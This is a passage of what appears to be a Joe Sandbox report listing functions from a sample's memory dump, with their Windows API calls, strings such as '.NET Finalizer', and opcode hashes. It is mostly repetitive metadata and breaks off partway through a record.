Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: File$ErrorLast$CloseHandleView$Unmap$CreateMapping$Sizefree
String ID:
API String ID: 2050550979-0
Opcode ID: dae5bf552be310688f9f621c503ddfe26e56e3ab12842b112d4ccb84c9a83a92
Instruction ID: 47b13608acef61fe3745df0b14f75efdaf9df04219c1c96def1002b8ec526ce2
Opcode Fuzzy Hash: dae5bf552be310688f9f621c503ddfe26e56e3ab12842b112d4ccb84c9a83a92
Instruction Fuzzy Hash: EFD151B0A00204DFDB14CFA9C948B9EBBF5FF48314F14826DE929AB391DB759944CB91

Function 0096E7E0 Relevance: 15.2, APIs: 10, Instructions: 218
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00B7721D,00000000), ref: 0096E7F7
GetNumaHighestNodeNumber.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,00B7721D,00000000), ref: 0096E830
GetCurrentProcess.KERNEL32(?,00B7721D,?,?,?,?,?,?,?,?,?,00B7721D,00000000), ref: 0096E856
GetProcessAffinityMask.KERNEL32(00000000), ref: 0096E85D
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00B7721D,00000000), ref: 0096E8A9
HeapAlloc.KERNEL32(03400000,00000000,00000004,?,?,?,?,?,?,?,?,?,00B7721D,00000000), ref: 0096E8C1
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00B7721D,00000000), ref: 0096E927
HeapAlloc.KERNEL32(03400000,00000000,00000010,?,?,?,?,?,?,?,?,?,00B7721D,00000000), ref: 0096E93F
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00B7721D,00000000), ref: 0096EA26
HeapAlloc.KERNEL32(03400000,00000000,00000004,?,?,?,?,?,?,?,?,?,00B7721D,00000000), ref: 0096EA3E

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$Process$Alloc$AffinityCurrentHighestInfoMaskNodeNumaNumberSystem
String ID:
API String ID: 4161135185-0
Opcode ID: 65b375030d569f153805451246506bad3e40bb71f7d0108683df21db2f21137a
Instruction ID: d1822cb0a8e1c5e400b1ec490a5b4c0473ae9ba1b6153e687ac400c3180fdc40
Opcode Fuzzy Hash: 65b375030d569f153805451246506bad3e40bb71f7d0108683df21db2f21137a
Instruction Fuzzy Hash: B6A124B5600385DBEB11CF69E84875A7BE6B747309F184619E405CB360D7F68A48CFB2

Function 00830570 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMemoryResourceNotification.KERNEL32(00000000,BBFE6088,00000000,?,00000000,00C331B4,000000FF,?,00B76372,?,?,?,?,?,?,00000000), ref: 00830596

Part of subcall function 0096F380: GetProcessHeap.KERNEL32(?,0097299A,0000000C,BBFE6088,?,00000002,?,?,00C11AA4,000000FF,?,0097DCAE,00000002,00000002), ref: 0096F38C
Part of subcall function 0096F380: RtlAllocateHeap.NTDLL(03400000,00000000,00000002,?,0097299A,0000000C,BBFE6088,?,00000002,?,?,00C11AA4,000000FF,?,0097DCAE,00000002), ref: 0096F3AA

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 008305E8
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00830648
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 008306A8
ResumeThread.KERNELBASE(00000264,00000000,008304A0,00000000,.NET Finalizer), ref: 0083072F

Strings

ResumeThread, xrefs: 0083073C
.NET Finalizer, xrefs: 0083070C

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Create$Event$Heap$AllocateMemoryNotificationProcessResourceResumeThread
String ID: .NET Finalizer$ResumeThread
API String ID: 1015390596-3261778472
Opcode ID: bf3133801210906ffd42c033ab4b8c7e607221d14296645eb39469f2ed46ad94
Instruction ID: 6b8c62a5a260eba4a797072917865b8c4b9f6bcf82274b503d93177854571415
Opcode Fuzzy Hash: bf3133801210906ffd42c033ab4b8c7e607221d14296645eb39469f2ed46ad94
Instruction Fuzzy Hash: A3519070A51755ABE7309F648D1675AB6E4FB85B20F20471AF561EB3C0EBF499408BC0

Function 007D9F00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 007D9F6C
OpenThreadToken.ADVAPI32(00000000), ref: 007D9F73
RevertToSelf.ADVAPI32 ref: 007D9F7D
SetThreadToken.ADVAPI32(00000000,000000FF,00000000,00000000,00000001), ref: 007D9FDD
SetThreadDescription.KERNELBASE ref: 007DA042
CloseHandle.KERNEL32(000000FF), ref: 007DA059

Strings

UndoRevert/SetThreadToken failed for hToken = %d, xrefs: 007D9FF9

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Thread$Token$CloseCurrentDescriptionHandleOpenRevertSelf
String ID: UndoRevert/SetThreadToken failed for hToken = %d
API String ID: 1971310446-1701864498
Opcode ID: f11e0f30975959ec68ba01a928173c86115d8f68d401266ddc29036345e3f3a7
Instruction ID: da9fb5770db787e33428f7b5aaa3f0b4c5719efefb646a575be9ae1d578f8e2d
Opcode Fuzzy Hash: f11e0f30975959ec68ba01a928173c86115d8f68d401266ddc29036345e3f3a7
Instruction Fuzzy Hash: 0D419271E00249AFDB20DFA8DC49B9EBBB8FB44714F144229F515E73D1D7B98A048BA1

Function 009A9ED0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 117threadsynchronizationCOMMON

Download Yara Rule

APIs

SetThreadDescription.KERNELBASE ref: 009A9F35
GetCurrentThreadId.KERNEL32 ref: 009A9FCB
WaitForSingleObject.KERNEL32(0000020C,000000FF), ref: 009A9FF6

Part of subcall function 009903F0: LeaveCriticalSection.KERNEL32(00000024,00000000,009A9C78), ref: 00990400
Part of subcall function 009903F0: SleepEx.KERNEL32(000000FF,00000000), ref: 00990446

Strings

Debugger Thread spinning up, xrefs: 009A9F5C
.NET Debugger, xrefs: 009A9F0C

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Thread$CriticalCurrentDescriptionLeaveObjectSectionSingleSleepWait
String ID: .NET Debugger$Debugger Thread spinning up
API String ID: 3582553491-698254634
Opcode ID: 43f3a4e2ae164f2b96fc4ec27c26e4e8f8a2cc43683b1f224eb3b6dec439536e
Instruction ID: 0c45e124be1f1978e717323b6cdaba279686d0c47024e5e483aea7186e277b5e
Opcode Fuzzy Hash: 43f3a4e2ae164f2b96fc4ec27c26e4e8f8a2cc43683b1f224eb3b6dec439536e
Instruction Fuzzy Hash: 3C410370A00211AFDB64DF78C9857AABBB8FF86710F00426AE921932D2DB709D44CBD1

Function 008308D0 Relevance: 7.9, APIs: 6, Instructions: 353memoryCOMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(00000000), ref: 00830969
VirtualAlloc.KERNELBASE(00000000,?,00002000,00000004), ref: 00830A99
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004), ref: 00830AC7
LeaveCriticalSection.KERNEL32(00000000,00000004,00000000,?,00000000,00000004), ref: 00830BA0
LeaveCriticalSection.KERNEL32(-0000001C), ref: 00830C77
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004), ref: 00830AE5

Part of subcall function 008B4F60: SetEvent.KERNEL32(03426908,03426878,00000001,008B4C54), ref: 008B4FD0

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: AllocCriticalLeaveSectionVirtual$Event
String ID:
API String ID: 1244136001-0
Opcode ID: bb73b69b981b579ade8f00f530343fe2ff935e86a586c974d3c5f73b81064eaa
Instruction ID: a3f69b6035af09f6da314b1ca5592a9b678e75b9368b2528cfa3beb906d34378
Opcode Fuzzy Hash: bb73b69b981b579ade8f00f530343fe2ff935e86a586c974d3c5f73b81064eaa
Instruction Fuzzy Hash: E3E16B70A00309DFDB24CFA8D4947AEBBB0FB88314F14816AE855E7392DB75A941CF91

Function 007D8270 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 256threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 007D830B

Strings

T::ST - recycling thread 0x%p (state: 0x%x), xrefs: 007D8385

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CurrentThread
String ID: T::ST - recycling thread 0x%p (state: 0x%x)
API String ID: 2882836952-1329013172
Opcode ID: a8e0ef458402b6b4021ee3ac33af3361baaa02a8f31c992d3cf9cbb476deafe1
Instruction ID: b84cf31fca2ea7542968a614ede081a65a1b0c364539b7069d36ee61d73c1565
Opcode Fuzzy Hash: a8e0ef458402b6b4021ee3ac33af3361baaa02a8f31c992d3cf9cbb476deafe1
Instruction Fuzzy Hash: D9A1F270A00345DFEB55DF64C8857AEBBB0FF05304F14416AE95AA7382DFB8A944CB92

Function 0079A0A0 Relevance: 6.6, APIs: 5, Instructions: 347COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00DB3B28,BBFE6088,03426818,00000000,?,00C21DB1,000000FF,?,00713126,00DB3670,00DB3DF0,00000000), ref: 0079A0E4
InitializeCriticalSection.KERNEL32(00DB3D9C,?,00713126,00DB3670,00DB3DF0,00000000), ref: 0079A108
InitializeCriticalSection.KERNEL32(00DB3D64,?,00713126,00DB3670,00DB3DF0,00000000), ref: 0079A12C
LeaveCriticalSection.KERNEL32(00DAABD0,?,?,00008000,00C6B730,00000002,00000000,007BCA10,00000018), ref: 0079A4B0
InitializeCriticalSection.KERNEL32(00C6B5E4,00003000,00001000,00000000,?,03433A20,00000001,?,00000000,00000000,?,?,?,?,?), ref: 0079A2DD

Part of subcall function 0096F380: GetProcessHeap.KERNEL32(?,0097299A,0000000C,BBFE6088,?,00000002,?,?,00C11AA4,000000FF,?,0097DCAE,00000002,00000002), ref: 0096F38C
Part of subcall function 0096F380: RtlAllocateHeap.NTDLL(03400000,00000000,00000002,?,0097299A,0000000C,BBFE6088,?,00000002,?,?,00C11AA4,000000FF,?,0097DCAE,00000002), ref: 0096F3AA

Part of subcall function 0074F7B0: EnterCriticalSection.KERNEL32(74FDD070,?,74FDD070,?,74FDD070,?,008384AE,?,00983B95), ref: 0074F839

Part of subcall function 0072CC40: HeapFree.KERNEL32(00000000,00000000,0341A128,00000000,00C6B5D4,00C6B4E4,?,?,0079A4A7,?,?,00008000,00C6B730,00000002,00000000,007BCA10), ref: 0072CD2E

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalSection$Initialize$Heap$AllocateEnterFreeLeaveProcess
String ID:
API String ID: 158900126-0
Opcode ID: 31f0c4c502548303abd9155a943e47b0017320c265e5654b59fb751ca110235d
Instruction ID: a24ccd38b28295af94e70f65480198497d5727a397292501daedad2ca097c184
Opcode Fuzzy Hash: 31f0c4c502548303abd9155a943e47b0017320c265e5654b59fb751ca110235d
Instruction Fuzzy Hash: 86E1B3B1A017049FEB20CF68C895BDABBF4FF05310F144169E949AB382D7B96944CBE1

Function 00716020 Relevance: 6.4, APIs: 3, Strings: 1, Instructions: 394COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?,?), ref: 00716279
LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000004,00000009,?), ref: 007163A0
LeaveCriticalSection.KERNEL32(?,00000009,?), ref: 007163F1

Part of subcall function 008B4F60: SetEvent.KERNEL32(03426908,03426878,00000001,008B4C54), ref: 008B4FD0

Part of subcall function 008B4B70: GetLastError.KERNEL32(74FDD070,?,?,?,BBFE6088), ref: 008B4B7E

Strings

File load lock, xrefs: 007161C8

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalLeaveSection$ErrorEventLast
String ID: File load lock
API String ID: 3394562845-3356667065
Opcode ID: 7ce39fcb51b326534bbe4318e11d2f41071ec4be83aa3642ff5997401a9e814c
Instruction ID: c057a9790bc87e498842bff6a600e9e93c8c25953bc0378882e428e5c76f938d
Opcode Fuzzy Hash: 7ce39fcb51b326534bbe4318e11d2f41071ec4be83aa3642ff5997401a9e814c
Instruction Fuzzy Hash: D8025970E01248DFDB24CFA8C448BEEBBB1AF49314F148159E855AB3D2DB799D85CB90

Function 00721B90 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 266COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(-00000004,?,?,?,?,?,?,?), ref: 00721C8C
InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?), ref: 00721CB0
InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?), ref: 00721CD4

Part of subcall function 0071CFB0: LeaveCriticalSection.KERNEL32(?,?,BBFE6088,?,00000000), ref: 0071D034

Strings

RefEmit_InMemoryManifestModule, xrefs: 00721DA0

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalSection$Initialize$Leave
String ID: RefEmit_InMemoryManifestModule
API String ID: 664292470-2496751632
Opcode ID: 309f2716a021625682f01f2979524c75bca3b2ecfbf1da91065c0f00b31ce3f3
Instruction ID: 0f76b5a336efff3ab53db3f2e1e11181928087fe5714761741fc0fe1379d199c
Opcode Fuzzy Hash: 309f2716a021625682f01f2979524c75bca3b2ecfbf1da91065c0f00b31ce3f3
Instruction Fuzzy Hash: 75C17CB1900614DFDB20DF68C849BAEBBB4FF18314F154259E856AB391C7B8AA45CBD0

Function 007B52D0 Relevance: 6.1, APIs: 4, Instructions: 76threadCOMMON

Download Yara Rule

APIs

SetThreadErrorMode.KERNEL32(00008001,?,BBFE6088,?,?), ref: 007B532C
SetThreadErrorMode.KERNEL32(?,00000000,?,00000003,00000080), ref: 007B53A5

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ErrorModeThread
String ID:
API String ID: 3782313741-0
Opcode ID: e88db53bac3485112633292bc0a19507e577782dc3deac58e53050378130064f
Instruction ID: 8c3bce5694165f43364c506a613b32554ca92a95561e2226a6f497c573e03bae
Opcode Fuzzy Hash: e88db53bac3485112633292bc0a19507e577782dc3deac58e53050378130064f
Instruction Fuzzy Hash: AC21B171900655DFC720CF68C805B9EBBF4EB08724F204719E956A73D0C7B86A448BA0

Function 007EB940 Relevance: 6.0, APIs: 4, Instructions: 45threadCOMMON

Download Yara Rule

APIs

SetThreadErrorMode.KERNEL32(00008001,?,BBFE6088,?,00000000), ref: 007EB979

Part of subcall function 009869D0: LoadLibraryExW.KERNEL32(?,00000000,?,?,?,00000000,?), ref: 00986B21
Part of subcall function 009869D0: GetLastError.KERNEL32 ref: 00986B2F
Part of subcall function 009869D0: SetLastError.KERNEL32(00000000), ref: 00986C64

GetLastError.KERNEL32(?,?,00000000), ref: 007EB995
SetThreadErrorMode.KERNEL32(?,00000000,?,00000000), ref: 007EB9AF
SetLastError.KERNEL32(00000000,?,00000000), ref: 007EB9B6

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Error$Last$ModeThread$LibraryLoad
String ID:
API String ID: 3861856538-0
Opcode ID: 666a24b298b05fd0f27839b8c2e5b58d907ebd9db424fac7a28837ef686e626e
Instruction ID: c97dcc50c705602dbcc92720640f7146d22831360c3df93ea0a253cebcc3aa36
Opcode Fuzzy Hash: 666a24b298b05fd0f27839b8c2e5b58d907ebd9db424fac7a28837ef686e626e
Instruction Fuzzy Hash: 97015272900249EFCB20DF55DC49B9EBFB8EB49720F10422AE915E33D0D7B55A44CB91

Function 008DA7C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

WerRegisterRuntimeExceptionModule.KERNELBASE(00000000,00710000,?,BBFE6088,03426818,00000000), ref: 008DA938

Strings

WATSON support: registered DAC dll with WerRegisterRuntimeExceptionModule, xrefs: 008DAA7D
WATSON support: failed to register DAC dll with WerRegisterRuntimeExceptionModule, xrefs: 008DAA64

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ExceptionModuleRegisterRuntime
